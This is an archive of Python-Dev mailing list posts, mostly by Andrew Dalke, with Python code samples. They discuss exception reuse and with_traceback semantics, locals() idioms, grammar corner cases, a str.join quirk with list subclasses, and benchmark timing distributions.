easier, including with asyncore and Allegra.  They are not
as general purpose, but it's hard for me to believe the extra
layers in Twisted are needed to get that extra whatever
functionality.

My other belief is that async programming is hard for most
people, who would rather do "normal" programming instead
of "inside-out" programming.  Because of this 2nd belief I
am interested in something like Stackless on top of an
async library.

> As a personal anecdote, I've never once had to chase a bug through any of the
> 6 "generic calls" singled out.  I can't think of a case where I've helped any
> one else who had to do this, either.  That part of Twisted is very old, it is
> _very_ close to bug-free, and application code doesn't have very much control
> over it at all.  Perhaps in order to avoid scaring people, there should be a
> way to elide frames from a traceback (I don't much like this myself, I worry
> about it going wrong and chopping out too much information, but I have heard
> other people ask for it)?

Even though I said some of this earlier I'll elaborate for clarification.

The specific bug I was tracking down had *no* traceback.  There w

[Python-Dev] with_traceback

2007-02-26 Thread Andrew Dalke
Guido's talk at PyCon said:

>  Use raise E(arg).with_traceback(tb)
>  instead of raise E, arg, tb

That seems strange to me because of the mutability.  Looking through
the back discussions on this list I see Guido commented:
 http://mail.python.org/pipermail/python-3000/2007-February/005689.html

> Returning the mutated object is acceptable here
> because the *dominant* use case is creating and raising an exception
> in one go:
>
>  raise FooException().with_traceback()

The 3 argument raise statement is rarely used, in my experience.
I believe most don't even know it exists, except for advanced
Python programmers and language lawyers.

My concern when I saw Guido's keynote was the worry that
people do/might write code like this

NO_END_OF_RECORD = ParserError("Cannot find end of record")

def parse_record(input_file):
    ...
    raise NO_END_OF_RECORD
    ...


That is, create instances at the top of the module, to be used
later.  This code assumes that the NO_END_OF_RECORD
exception instance is never modified.

If the traceback is added to its __traceback__ attribute then
I see two problems if I were to write code like the above:

  - the traceback stays around "forever"
  - the code is no longer thread-safe.
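
A sketch of the thread problem - my own example, showing two threads
racing to set the single __traceback__ slot on a shared instance:

import threading

SHARED = Exception("shared instance")

def worker():
    try:
        raise SHARED   # under the 3.x proposal, this sets SHARED.__traceback__
    except Exception:
        pass
    # Two threads running this at once each overwrite the one
    # __traceback__ attribute, so a handler inspecting it may
    # see the other thread's stack.

for i in range(2):
    threading.Thread(target=worker).start()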


As an example of code which is affected by this, see pyparsing,
which has code that looks like

class Token(ParserElement):
    """Abstract ParserElement subclass, for defining atomic matching patterns."""
    def __init__( self ):
        super(Token,self).__init__( savelist=False )
        self.myException = ParseException("",0,"",self)


class Literal(Token):

    def parseImpl( self, instring, loc, doActions=True ):
        if (instring[loc] == self.firstMatchChar and
            (self.matchLen==1 or instring.startswith(self.match,loc)) ):
            return loc+self.matchLen, self.match
        #~ raise ParseException( instring, loc, self.errmsg )
        exc = self.myException
        exc.loc = loc
        exc.pstr = instring
        raise exc

The "Literal" and other token classes are part of the
grammar definition and usually exist in module scope.



There's another question I came up with.  If the exception
already has a __traceback__, will that traceback be
overwritten if the instance is reraised?  Consider this code,
loosly derived from os._execvpe

import os, sys
_PATH = ["here", "there", "elsewhere"]

def open_file_on_path(name):
    # If nothing exists, raises an exception based on the
    # first attempt
    saved_err = None
    saved_tb = None
    for dirname in _PATH:
        try:
            return open(os.path.join(dirname, name))
        except Exception, err:
            if not saved_err:
                saved_err = err
                saved_tb = sys.exc_info()[2]
    raise saved_err.__class__, saved_err, saved_tb

open_file_on_path("spam")

which generates this

Traceback (most recent call last):
  File "raise.py", line 19, in 
open_file_on_path("spam")
  File "raise.py", line 11, in open_file_on_path
return open(os.path.join(dirname, name))
IOError: [Errno 2] No such file or directory: 'here/spam'

What is the correct way to rewrite this for use
with "with_traceback"?  Is it

def open_file_on_path(name):
    # If nothing exists, raises an exception based on the
    # first attempt
    saved_err = None
    for dirname in _PATH:
        try:
            return open(os.path.join(dirname, name))
        except Exception, err:
            if not saved_err:
                saved_err = err
                saved_tb = sys.exc_info()[2]
    raise saved_err.with_traceback(saved_err.__traceback__)


One alternative, btw, is
  raise saved_err.with_traceback()

to have it use the existing __traceback__ (and raising its
own exception if __traceback__ is None?)

Andrew
[EMAIL PROTECTED]


Re: [Python-Dev] with_traceback

2007-02-26 Thread Andrew Dalke
PJE:
> Then don't do that, as it's bad style for Python 3.x.  ;-)

It's bad style for 3.x only if Python goes with this interface.  If
it stays with the 2.x style then there's no problem.  There
may also be solutions which are cleaner and which don't
mutate the exception instance.

I am not proposing such a syntax.  I have ideas, but I am not a
language designer and have long given up the idea that I
might be good at it.

> This does mean you won't be able to port your code to 3.x style until
> you've gotten rid of shared exception instances from all your dependencies,
> but 3.x porting requires all your dependencies to be ported anyway.

What can be done to minimize the number of dependencies which
need to be changed?

> It should be sufficient in both 2.x and 3.x for with_traceback() to raise
> an error if the exception already has a traceback -- this should catch any
> exception instance reuse.

That would cause a problem in my example where I save then
reraise the exception, as

  raise saved_err.with_traceback(saved_err.__traceback__)

> >What is the correct way to rewrite this for use
> >with "with_traceback"?  Is it
  [...]

> No, it's more like this:
>
>  try:
>      for dirname in ...
>          try:
>              return ...
>          except Exception as err:
>              saved_err = err
>      raise saved_err
>  finally:
>      del saved_err

I don't get it.  The "saved_err" has a __traceback__
attached to it, and is reraised.  Hence it gets the old
stack, right?

Suppose I wrote

ERR = Exception("Do not do that")

try:
  f(x)
except Exception:
  raise ERR

try:
  f(x*2)
except Exception:
  raise ERR

Yes it's bad style, but people will write it.  The ERR gets
the traceback from the first time there's an error, and
that traceback is locked in ... since raise won't change
the __traceback__ if one exists.  (Based on what you
said it does.)


> I've added the outer try-finally block to minimize the GC impact of the
> *original* code you showed, as the `saved_tb` would otherwise have created
> a cycle.  That is, the addition is not because of the porting, it's just
> something that you should've had to start with.

Like I said, I used code based on os._execvpe.  Here's the code

saved_exc = None
saved_tb = None
for dir in PATH:
    fullname = path.join(dir, file)
    try:
        func(fullname, *argrest)
    except error, e:
        tb = sys.exc_info()[2]
        if (e.errno != ENOENT and e.errno != ENOTDIR
                and saved_exc is None):
            saved_exc = e
            saved_tb = tb
if saved_exc:
    raise error, saved_exc, saved_tb
raise error, e, tb

I see similar use in atexit._run_exitfuncs, though as Python
is about to exit it won't make a real difference.

doctest shows code like

 >>> exc_info = failure.exc_info
 >>> raise exc_info[0], exc_info[1], exc_info[2]

SimpleXMLRPCServer does things like

except:
    # report exception back to server
    exc_type, exc_value, exc_tb = sys.exc_info()
    response = xmlrpclib.dumps(
        xmlrpclib.Fault(1, "%s:%s" % (exc_type, exc_value)),
        encoding=self.encoding, allow_none=self.allow_none,
        )


I see threading.py gets it correctly.

My point here is that most Python code which uses the traceback
doesn't break the cycle, so it must be cleaned up by the gc.  While
there might be a more correct way to do it, it's too complicated
for most to get it right.
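
For reference, the careful pattern looks something like this;
'report' is a hypothetical stand-in for whatever uses the traceback:

import sys

def handle_error():
    exc_type, exc_value, exc_tb = sys.exc_info()
    try:
        report(exc_type, exc_value, exc_tb)   # hypothetical handler
    finally:
        # explicitly break the frame <-> traceback reference cycle
        del exc_tb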

> Anyway, the point here is that in 3.x style, most uses of 3-argument raise
> just disappear altogether.  If you hold on to an exception instance, you
> have to be careful about it for GC, but no more so than in current Python.

Where people already make a lot of mistakes.  But my concern
is not in the gc, it's in the mutability of the exception causing hard
to track down problems in code which is written by beginning to
intermediate users.

> The "save one instance and use it forever" use case is new to me - I've
> never seen nor written code that uses it before now.  It's definitely
> incompatible with 3.x style, though.

I pointed out an example in pyparsing.  Thomas W. says he's
seen other code.  I've been looking for another real example but
as this is relatively uncommon code, I don't have a wide enough
corpus for the search.  I also don't know of a good tool for searching
for this sort of thing.  (Eg, www.koders.com doesn't help.)

It's a low probability occurrence.  So is the use of the 3 arg raise.
Hence it's hard to get good intuition about problems which might
arise.

Andrew
[EMAIL PROTECTED]


Re: [Python-Dev] with_traceback

2007-02-28 Thread Andrew Dalke
Glyph:
> This seems like kind of a strange micro-optimization to have an impact
> on a language change discussion.

Just as a reminder, my concern is that people reuse exceptions (rarely)
and that the behavior of the "with_traceback()" method is ambiguous
when that happens.  It has nothing to do with optimization.

The two solutions of:
  1. always replace an existing __traceback__
  2. never replace an existing __traceback__
both seem to lead to problems.

Here are minimal examples for thought:

# I know PJE says this is bad style for 3.0.  Will P3K help
# identify this problem?  If it's allowable, what will it do?
# (Remember, I found existing code which reuses exceptions
# so this isn't purely theoretical, only rare.)

BAD = Exception("that was bad")
try:
  raise BAD
except Exception:
  pass
raise BAD  # what traceback will be shown here?

(Oh, and what would a debugger report?)

# 2nd example; reraise an existing exception instance.
# It appears that any solution which reports a problem
# for #1 will not allow one or both of the following.

try:
  raise Exception("bad")
except Exception as err:
  first_err = err
try:
  raise Exception("bad")
except Exception:
  raise first_err  # what traceback will be shown here?

# 3rd example, like the 2nd but end it with

  raise first_err.with_traceback(first_err.__traceback__)
  # what traceback will be shown here?



> I'm sorry if this has been proposed already in this discussion (I
> searched around but did not find it),

I saw references to a PEP about it but could not find the PEP.
Nor could I find much discussion either.  I would like to know
the details.  I assume that "raise" adds the __traceback__ if
it's not None, hence there's no way it can tell if the __traceback__
on the instance was created with "with_traceback()" from an
earlier "raise" or from the with_traceback.

But in the current examples it appears that the Exception class
could attach a traceback during instantiation and "with_traceback"
simply replaces that.  I doubt this is the case, but cannot be definitive.

While variant method/syntax may improve matters, I think people
will write code as above -- all of which are valid Python 2.x and
3.x -- and end up with strange and hard to interpret tracebacks.

Andrew
[EMAIL PROTECTED]


Re: [Python-Dev] with_traceback

2007-02-28 Thread Andrew Dalke
On 2/28/07, James Y Knight <[EMAIL PROTECTED]> wrote:
> It seems to me that a stack trace should always be attached to an
> exception object at creation time of the exception, and never at any
> other time. Then, if someone pre-creates an exception object, they
> get consistent and easily explainable behavior (the traceback to the
> creation point). The traceback won't necessarily be *useful*, but
> presumably someone pre-creating an exception object did so to save
> run-time, and creating the traceback is generally very expensive, so
> doing that only once, too, seems like a win to me.

The only example I found in about 2 dozen packages where the
exception was precreated was in pyparsing.  I don't know the reason
why it was done that way, but I'm certain it wasn't for performance.

The exception is created as part of the format definition.  In that
case if the traceback is important then it's important to know which
code was attempting the parse.  The format definition was almost
certainly done at module import time.

In any case, reraising the same exception instance is a rare
construct in current Python code.  PJE had never seen it before.
It's hard to get a good intuition from zero data points.  :)


Re: [Python-Dev] with_traceback

2007-03-02 Thread Andrew Dalke
On 3/1/07, Guido van Rossum <[EMAIL PROTECTED]> wrote:
> Since by far the most common use case is to create the
> exception in the raise statement, the behavior there won't be any
> different than it is today; the traceback on precreated objects will
> be useless, but folks who precreate them for performance reasons
> presumably won't care; and those that create global exception
> instances by mistakenly copying the wrong idiom, well, they'll learn
> quickly (and a lot more quickly than when we try to override the
> exception).

Here are a few more examples of code which don't follow the idiom

  raise ExceptionClass(args)


Zope's ZConfig/cmdline.py

def addOption(self, spec, pos=None):
    if pos is None:
        pos = "", -1, -1
    if "=" not in spec:
        e = ZConfig.ConfigurationSyntaxError(
            "invalid configuration specifier", *pos)
        e.specifier = spec
        raise e


The current xml.sax.handler.ErrorHandler includes

def error(self, exception):
    "Handle a recoverable error."
    raise exception

def fatalError(self, exception):
    "Handle a non-recoverable error."
    raise exception

and is used like this in xml.sax.expatreader.ExpatParser.feed

try:
    # The isFinal parameter is internal to the expat reader.
    # If it is set to true, expat will check validity of the entire
    # document. When feeding chunks, they are not normally final -
    # except when invoked from close.
    self._parser.Parse(data, isFinal)
except expat.error, e:
    exc = SAXParseException(expat.ErrorString(e.code), e, self)
    # FIXME: when to invoke error()?
    self._err_handler.fatalError(exc)

Note that the handler may decide to ignore the exception,
based on which error occurred.  The traceback should show
where in the handler the exception was raised, and not
the point at which the exception was created.


ZODB/Connection.py:
        ...
        if isinstance(store_return, str):
            assert oid is not None
            self._handle_one_serial(oid, store_return, change)
        else:
            for oid, serial in store_return:
                self._handle_one_serial(oid, serial, change)

    def _handle_one_serial(self, oid, serial, change):
        if not isinstance(serial, str):
            raise serial
        ...

   Andrew
   [EMAIL PROTECTED]


Re: [Python-Dev] Another traceback idea [was: except Exception as err, tb]

2007-03-02 Thread Andrew Dalke
On 3/2/07, Greg Ewing <[EMAIL PROTECTED]> wrote:
> This has given me another idea:
   ...
> Now, I'm not proposing that the raise statement should
> actually have the above syntax -- that really would be
> a step backwards. Instead it would be required to have
> one of the following forms:
>
> raise ExceptionClass
>
> or
>
> raise ExceptionClass(args)
>
> plus optional 'with traceback' clauses in both cases.
> However, the apparent instantiation call wouldn't be
> made -- it's just part of the syntax.

Elsewhere here I listed several examples of existing
code which raises an instance which was caught or
created earlier.  That would not be supported if the
raise had to be written in your given forms.

Andrew
[EMAIL PROTECTED]


Re: [Python-Dev] PEP 344 (was: with_traceback)

2007-03-02 Thread Andrew Dalke
On 3/2/07, Guido van Rossum <[EMAIL PROTECTED]> wrote:
> So, despite the existence of libraries that pre-create exceptions, how
> bad would it really be if we declared that use unsafe? It wouldn't be
> hard to add some kind of boobytrap that goes off when pre-created
> exceptions are raised multiple times. If this had always been the
> semantics I'm sure nobody would have complained and I doubt that it
> would have been a common pitfall either (since if it doesn't work,
> there's no bad code abusing it, and so there are no bad examples that
> newbies could unwittingly emulate).

Here's code from os._execvpe which re-raises an exception instance
created earlier:

saved_exc = None
saved_tb = None
for dir in PATH:
    fullname = path.join(dir, file)
    try:
        func(fullname, *argrest)
    except error, e:
        tb = sys.exc_info()[2]
        if (e.errno != ENOENT and e.errno != ENOTDIR
            and saved_exc is None):
            saved_exc = e
            saved_tb = tb
if saved_exc:
    raise error, saved_exc, saved_tb
raise error, e, tb

Would the boobytrap go off in this case?  I think it would, because
"saved_exc" is an instance that was already raised once inside the loop
and is raised a second time at the end.

Andrew
[EMAIL PROTECTED]


Re: [Python-Dev] Performance of pre-creating exceptions?

2007-03-02 Thread Andrew Dalke
On 3/2/07, Adam Olsen <[EMAIL PROTECTED]> wrote:
> We can get more than half of the benefit simply by using a default
> __init__ rather than a python one.  If you need custom attributes but
> they're predefined you could subclass the exception and have them as
> class attributes.  Given that, is there really a need to pre-create
> exceptions?

The only real world example of (re)using pre-computed exceptions
I found was in pyparsing.  Here are two examples:

def parseImpl( self, instring, loc, doActions=True ):
    if (instring[loc] == self.firstMatchChar and
        (self.matchLen==1 or instring.startswith(self.match,loc)) ):
        return loc+self.matchLen, self.match
    #~ raise ParseException( instring, loc, self.errmsg )
    exc = self.myException
    exc.loc = loc
    exc.pstr = instring
    raise exc

(The Token's constructor is

class Token(ParserElement):
    def __init__( self ):
        super(Token,self).__init__( savelist=False )
        self.myException = ParseException("",0,"",self)

and the exception class uses __slots__ thusly:

class ParseBaseException(Exception):
    """base exception class for all parsing runtime exceptions"""
    __slots__ = ( "loc","msg","pstr","parserElement" )
    # Performance tuning: we construct a *lot* of these, so keep this
    # constructor as small and fast as possible
    def __init__( self, pstr, loc, msg, elem=None ):
        self.loc = loc
        self.msg = msg
        self.pstr = pstr
        self.parserElement = elem


so you can see that each raised exception modifies 2 of
the 4 instance variables in a ParseException.)

-and-

# this method gets repeatedly called during backtracking with the same
# arguments - we can cache these arguments and save ourselves the
# trouble of re-parsing the contained expression
def _parseCache( self, instring, loc, doActions=True, callPreParse=True ):
    lookup = (self,instring,loc,callPreParse)
    if lookup in ParserElement._exprArgCache:
        value = ParserElement._exprArgCache[ lookup ]
        if isinstance(value,Exception):
            if isinstance(value,ParseBaseException):
                value.loc = loc
            raise value
        return value
    else:
        try:
            ParserElement._exprArgCache[ lookup ] = \
                value = self._parseNoCache( instring, loc,
                                            doActions, callPreParse )
            return value
        except ParseBaseException, pe:
            ParserElement._exprArgCache[ lookup ] = pe
            raise


The first definitely has the look of a change made for performance.
I have not asked the author, nor done the research, to learn how much
gain there was from this code.

Because the saved exception is tweaked each time (hence not
thread-safe), your timing tests aren't directly relevant: your solution
of creating the exception with the default constructor and then
tweaking the instance attributes directly would end up doing 4 setattrs
instead of 2.

% python -m timeit -r 10 -n 100 -s 'e = Exception()' \
      'try: raise e' 'except: pass'
100 loops, best of 10: 1.55 usec per loop
% python -m timeit -r 10 -n 100 -s 'e = Exception()' \
      'try: e.x=1;e.y=2;raise e' 'except: pass'
100 loops, best of 10: 1.98 usec per loop

so 4 attributes should take about 2.5 usec, or about 25% slower than 2 attributes.


There's also a timing difference between looking up the exception
class name in module scope vs. using self.myException.
I've tried to find other examples but couldn't in the 20 or so packages
I have on my laptop.  I used searches like

# find module variables assigned to exception instances
egrep "^[a-z].*=.*Error\(" *.py
egrep "^[a-z].*=.*Exception\(" *.py

# find likely instances being raised
grep "^ *raise [a-z]" *.py
# find likely cases of 3-arg raises
grep "^ *raise .*,.*," *.py

to find candidates.  Nearly all false positives.

Andrew
[EMAIL PROTECTED]


Re: [Python-Dev] locals(), closures, and IronPython...

2007-03-06 Thread Andrew Dalke
On 3/5/07, Guido van Rossum <[EMAIL PROTECTED]> wrote:
> I don't know too many good use cases for
> locals() apart from "learning about the implementation" I think this
> might be okay.

Since I'm watching this list for any discussion on the traceback
threads, I figured I would point out the most common use I know
for locals() is in string interpolation when there are many local
variables, eg:

   a = "spam"
   b = "egg"
...
   y = "foo"
   z = "bar"

  print fmtstr % locals()
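
A complete, runnable version of that idiom (all names invented for the
example):

def report(name, count):
    total = count * 2
    fmtstr = "%(name)s has %(count)d items (%(total)d including copies)"
    print fmtstr % locals()

report("spam", 3)    # prints: spam has 3 items (6 including copies)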

The next most is to deal with a large number of input parameters, as
this from decimal.py:

def __init__(self, prec=None, rounding=None,
             traps=None, flags=None,
             _rounding_decision=None,
             Emin=None, Emax=None,
             capitals=None, _clamp=0,
             _ignored_flags=None):
    ...
    for name, val in locals().items():
        if val is None:
            setattr(self, name, _copy.copy(getattr(DefaultContext, name)))
        else:
            setattr(self, name, val)

and this example based on a post of Alex Martelli's:

def __init__(self, fee, fie, foo, fum):
    self.__dict__.update(locals())
    del self.self

In both cases they are shortcuts to "reduce boilerplate".

I've more often used the first form in my code.  If locals() in an
inner scope returned a superset of the items it returns now, I would
not be concerned.

I've rarely used the 2nd form in my code.  The only way
I can see there being a problem is if a function defines
a class, which then uses the locals() trick, because

>>> def blah():
...     a = 6; b = 7
...     class XYZ(object):
...         def __init__(self):
...             c = a
...             print "in the class", locals()
...     print "in the function", locals()
...     XYZ()
...
>>> blah()
in the function {'a': 6, 'XYZ': <class '__main__.XYZ'>, 'b': 7}
in the class {'a': 6, 'c': 6, 'self': <__main__.XYZ object at 0x72ad0>}

the code in the class's initializer will have more locals.  I've
never seen code like this (class defined in a function, with __init__
using locals()) and it's not something someone would write
thinking it was a standard way of doing things.


In both cases I'm not that bothered if it's implementation specific.
Using locals has the feel of being too much like a trick to get
around having to type so much.  That's what editor macros are for :)

Andrew
[EMAIL PROTECTED]


Re: [Python-Dev] locals(), closures, and IronPython...

2007-03-06 Thread Andrew Dalke
On 3/6/07, Mike Klaas <[EMAIL PROTECTED]> wrote:
> There's nothing quite like running help(func) and getting *args,
> **kwargs as the documented parameter list.

I think

>>> import resource
>>> help(resource.getpagesize)
Help on built-in function getpagesize in module resource:

getpagesize(...)


is pretty close.  :)

Andrew
[EMAIL PROTECTED]


[Python-Dev] small Grammar questions

2008-02-19 Thread Andrew Dalke
I'm finishing up a PLY lexer and parser for the current CVS version of
the Python grammar.  As part of it I've been testing a lot of dark
corners in the grammar definition and implementation.  Python 2.5 has
some small and rare problems which I'm pleased to note have been
pretty much fixed in Python 2.6.

I have two questions about the grammar definition.  Here's a
difference between 2.5 and 2.6.

% cat x.py
c = "This is 'c'"
def spam((a) = c):
  print a
spam()

% python2.5 x.py
This is 'c'
% python2.6 x.py
  File "x.py", line 2
def spam((a) = c):
SyntaxError: non-default argument follows default argument


I don't understand why that's changed.  This shouldn't be a
SyntaxError and there is no non-default argument following the default
argument.

Note that this is still valid

>>> def spam((a,) = c):
...   pass
...

I think 2.6 is incorrect.  According to the documentation at
  http://docs.python.org/ref/function.html

defparameter ::= parameter ["=" expression]
sublist      ::= parameter ("," parameter)* [","]
parameter    ::= identifier | "(" sublist ")"
funcname     ::= identifier
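
By those productions, "(a) = c" derives cleanly as a defparameter:

defparameter -> parameter "=" expression
             -> "(" sublist ")" "=" expression
             -> "(" parameter ")" "=" expression
             -> "(" identifier ")" "=" expression     # i.e. (a) = c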


Second question is about trailing commas in list comprehension.  I
don't understand why the commented out line is not allowed.

[x for x in 1]
#[x for x in 1,]  # This isn't legal
[x for x in 1,2]
[x for x in 1,2,]
[x for x in 1,2,3]

The Grammar file says

# Backward compatibility cruft to support:
# [ x for x in lambda: True, lambda: False if x() ]
# even while also allowing:
# lambda x: 5 if x else 2
# (But not a mix of the two)
testlist_safe: old_test [(',' old_test)+ [',']]

but if I change it to also allow

testlist_safe : old_test ','

then PLY still doesn't report any ambiguities in the grammar and I
can't find an expression that exhibits a problem.

Could someone here enlighten me?

Andrew
[EMAIL PROTECTED]


Re: [Python-Dev] small Grammar questions

2008-02-19 Thread Andrew Dalke
On Feb 19, 2008 1:38 PM, Andrew Dalke <[EMAIL PROTECTED]> wrote:
> def spam((a) = c):
>   print a

On Feb 20, 2008 12:29 AM, Brett Cannon <[EMAIL PROTECTED]> wrote:
> The error might be odd, but I don't see why that should be allowed
> syntax. Having a parameter surrounded by a parentheses like that makes
> no sense in a context of a place where arbitrary expressions are not
> allowed.

I'm fine with that.  This is a corner that no one but language lawyers
will care about.  The thing is, the online documentation and the
Grammar file allow it, as did Python 2.5.

In any case, the error message is not helpful.

> From what I can tell the grammar does not prevent it. But it is
> possible that during AST creation or bytecode compilation a specific
> check is made that is throwing the exception...

In my code it's during AST generation.  Your pointer to ast.c:672
was helpful.  It's stuff jeremy.hylton did in r54415.  Now I have to
figure out how Python's internal ASTs work, which might take a while.

> Are you asking why the decision was made to make the expression
> illegal, or why the grammar is flagging it is wrong?

Why it's illegal.  Supporting a comma doesn't seem to make anything
ambiguous, but PLY's LALR(1) parser might handle things that Python's
own LL(1) parser doesn't, and I don't have the experience to tell.

There are other places where the grammar definition allows syntax that
is rejected later on.  Those I can justify by saying it's easier to
define the grammar that way (hence f(1+1=2) is legal grammar but
illegal Python), or to produce better error messages (like "from .a
import *").

But this one prohibiting [x for x in 1,] I can't figure out.
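
Summarizing the variants (parse-time legality only; the first line
still fails at runtime, since an int isn't iterable), with the
parenthesized workaround added for comparison:

[x for x in 1]        # parses
#[x for x in 1,]      # SyntaxError - the one odd case
[x for x in 1, 2]     # parses
[x for x in 1, 2,]    # parses
[x for x in (1,)]     # parses - the parenthesized spelling of the odd case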


   Andrew
   [EMAIL PROTECTED]


Re: [Python-Dev] small Grammar questions

2008-02-19 Thread Andrew Dalke
Okay, my conclusion is

  def f((a)=5)

is wrong, and the code should be changed to report a better error
message.  I'll file a bug against that.

and I'm going with Brett suggestion that

  [x for x in 1,]

is not supported because it's almost certainly a programming error.  I
think therefore the comment in the Grammar file is distracting.  As
comments can be.


On Feb 20, 2008 3:08 AM, Steve Holden <[EMAIL PROTECTED]> wrote:
> The one that surprised me was the legality of
>
>  def eggs((a, )=c):
>  pass
>
> That just seems like unpacking-abuse to me.

Yep.  Here's another abuse, since I can't figure out when someone would
need a destructuring del statement.

>>> class X(object): pass
...
>>> X.a = 123
>>> X.b = "hello"
>>> X.c = 9.801
>>> X.a, X.b, X.c
(123, 'hello', 9.801)
>>> del (X.a, (X.b, (X.c,)))
>>> X.a, X.b, X.c
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: type object 'X' has no attribute 'a'
>>>

Is this going to be possible in Python3k?

> You really *have* been poking around in little-known crevices, haven't you?

Like this bug from 2.5, fixed in 2.6

>>> from __future__ import with_statement
>>> with f(x=5, 6):
...   pass
...
ValueError: field context_expr is required for With

  :)

Andrew
[EMAIL PROTECTED]


[Python-Dev] PySequence_Fast_GET_ITEM in string join

2006-05-23 Thread Andrew Dalke
The Sourceforge tracker is kaputt so I'm sending it here, in part
because the effbot says it's interesting.

I can derive from list and override __getitem__

>>> class Spam(list):
...     def __getitem__(self, i):
...         print i
...         return 2
...
>>> Spam()[1]
1
2
>>> Spam()[9]
9
2
>>>

Now consider the following

>>> class Spam(list):
...     def __getitem__(self, i):
...         print "Asking for", i
...         if i == 0: return "zero"
...         if i == 1: return "one"
...         raise IndexError, i
...
>>> Spam()[1]
Asking for 1
'one'
>>>

Spiffy!  For my next trick

 >>> "".join(Spam())
''
 >>>

The relevant code in stringobject uses PySequence_Fast_GET_ITEM(seq, i),
which likely doesn't know about my derived __getitem__.

p = PyString_AS_STRING(res);
for (i = 0; i < seqlen; ++i) {
    size_t n;
    item = PySequence_Fast_GET_ITEM(seq, i);
    n = PyString_GET_SIZE(item);
    memcpy(p, PyString_AS_STRING(item), n);
    p += n;
    if (i < seqlen - 1) {
        memcpy(p, sep, seplen);
        p += seplen;
    }
}


The Unicode join has the same problem

>>> class Spam(list):
...     def __getitem__(self, i):
...         print "Asking for", i
...         if i == 0: return "zero"
...         if i == 1: return u"one"
...         raise IndexError, i
...
>>> "".join(Spam())
''

While if my class is not derived from list, everything is copacetic.

>>> class Spam:
...     def __getitem__(self, i):
...         print "Asking for", i
...         if i == 0: return "zero"
...         if i == 1: return u"one"
...         raise IndexError, i
...
>>> "".join(Spam())
Asking for 0
Asking for 1
Asking for 2
u'zeroone'
>>>

Ditto for deriving from object.

>>> class Spam(object):
...     def __getitem__(self, i):
...         print "Asking for", i
...         if i == 0: return "zero"
...         if i == 1: return "one"
...         raise IndexError, i
...
>>> "".join(Spam())
Asking for 0
Asking for 1
Asking for 2
'zeroone'
>>>

Andrew
[EMAIL PROTECTED]



Re: [Python-Dev] PySequence_Fast_GET_ITEM in string join

2006-05-23 Thread Andrew Dalke
Me [Andrew Dalke] said:
> The relevant code in stringobject uses PySequence_Fast_GET_ITEM(seq, i),
> which likely doesn't know about my derived __getitem__.

Oops, I didn't know what the code was doing well enough.  The
relevant problem is

 seq = PySequence_Fast(orig, "");

A list subclass passes the PyList_Check test in there, so
PySequence_Fast hands my object back unchanged, and the
PySequence_Fast_GET_ITEM calls that follow read the underlying list
storage directly; they know nothing about my overridden __getitem__.
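
The same bypass is visible from Python (a sketch; iteration over a real
list never consults __getitem__ either):

class Spam(list):
    def __getitem__(self, i):
        print "Asking for", i
        return "x"

s = Spam()
print list(iter(s))   # [] - list iteration reads the internal array
print "".join(s)      # '' - join sees the same empty storage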

So things are working as designed.

Well, back to blundering about.  Too much brennivin. ;)

Andrew
[EMAIL PROTECTED]



Re: [Python-Dev] Python Benchmarks

2006-06-02 Thread Andrew Dalke

M.-A. Lemburg:
> The approach pybench is using is as follows:
> ...
> The calibration step is run multiple times and is used
> to calculate an average test overhead time.


One of the changes that occurred during the sprint was to change this
algorithm to use the best time rather than the average.  Using the
average assumes a Gaussian distribution, and timing results are not
Gaussian.  There is an absolute best time, but it's rarely reached
because of background noise.  The distribution is more like a gamma
distribution plus the minimum time.
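
A small simulation of that model (the parameters are invented; this is
not pybench code) shows why the two calibration strategies differ:

import random

true_cost = 0.47    # the unreachable best time
samples = [true_cost + random.gammavariate(0.5, 0.05) for i in range(1000)]

print "min: ", min(samples)                 # hugs the true cost
print "mean:", sum(samples) / len(samples)  # inflated by the long tail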

To show the distribution is non-Gaussian I ran the following

import time

def compute():
    x = 0
    for i in range(1000):
        for j in range(1000):
            x += 1

def bench():
    t1 = time.time()
    compute()
    t2 = time.time()
    return t2 - t1

times = []
for i in range(1000):
    times.append(bench())

print times

The full distribution is attached as 'plot1.png' and the close-up
(range 0.45-0.65) as 'plot2.png'.  It's not a clean gamma function, but
that's a closer match than an exponential.

The gamma distribution looks more like an exponential function when the
shape parameter is large.  This corresponds to a large amount of noise
in the system, so the run time is not close to the best time.  This
means the average approach works better when there is a lot of random
background activity, which is not the usual case when I try to
benchmark.

Averaging a gamma distribution leaves you with a bit of a skew, and I
think the skew depends on the number of samples, approaching a limit
point.

Using the minimum time should be more precise because there is a
definite lower bound and the machine should be stable.  In my test
above the first few results are

0.472838878632
0.473038911819
0.473326921463
0.473494052887
0.473829984665

I'm pretty certain the best time is 0.4725, or very close to that, but
the average time is 0.58330151391 because of the long tail.  Here are
the last 6 results in my population of 1000:

1.76353311539
1.79937505722
1.82750201225
2.01710510254
2.44861507416
2.90868496895

Granted, I hit a couple of web pages while doing this and my spam
filter processed
my mailbox in the background...

There's probably some Markov modeling which would look at the number
and distribution of samples so far and, assuming a gamma distribution,
determine how many more samples are needed to get a good estimate of
the absolute minimum time.  But min(large enough samples) should work
fine.


> If the whole suite runs in 50 seconds, the per-test
> run-times are far too small to be accurate. I usually
> adjust the warp factor so that each *round* takes
> 50 seconds.


The stringbench.py I wrote uses the timeit algorithm which
dynamically adjusts the test to run between 0.2 and 2 seconds.


> That's why the timers being used by pybench will become a
> parameter that you can then select to adapt pybench to
> the OS you're running pybench on.


Wasn't that decision a consequence of the problems found during
the sprint?

   Andrew
   [EMAIL PROTECTED]


[Attachments: plot1.png and plot2.png - PNG images of the timing distribution]


Re: [Python-Dev] Python Benchmarks

2006-06-02 Thread Andrew Dalke
On 6/2/06, Terry Reedy <[EMAIL PROTECTED]> wrote:
> Hardly a setting in which to run comparison tests, seems to me.

The point though was to show that the time distribution is non-Gaussian,
so intuition based on that doesn't help.

> > Using the minimum looks like the way to go for calibration.
>
> Or possibly the median.

Why?  I can't think of why that's more useful than the minimum time.

Given a large number of samples, the difference between the
minimum and the median/average/whatever mostly provides
information about the background noise, which is pretty irrelevant
to most benchmarks.

> But even better, the way to go to run comparison timings is to use a system
> with as little other stuff going on as possible.  For Windows, this means
> rebooting in safe mode, waiting until the system is quiescent, and then run
> the timing test with *nothing* else active that can be avoided.

A reason I program in Python is that I want to get work done, not deal
with stoic purity.  I'm not going to waste all that time (or the money
to buy a new machine) just to run a benchmark.

Just how much more accurate would that be over the numbers we get
now?  Have you tried it?  What additional sensitivity did you get, and
was the extra effort worthwhile?

> Even then, I would look at the distribution of times for a given test to
> check for anomalously high values that should be tossed.  (This can be
> automated somewhat.)

I say it can be automated completely.  Toss all but the lowest.
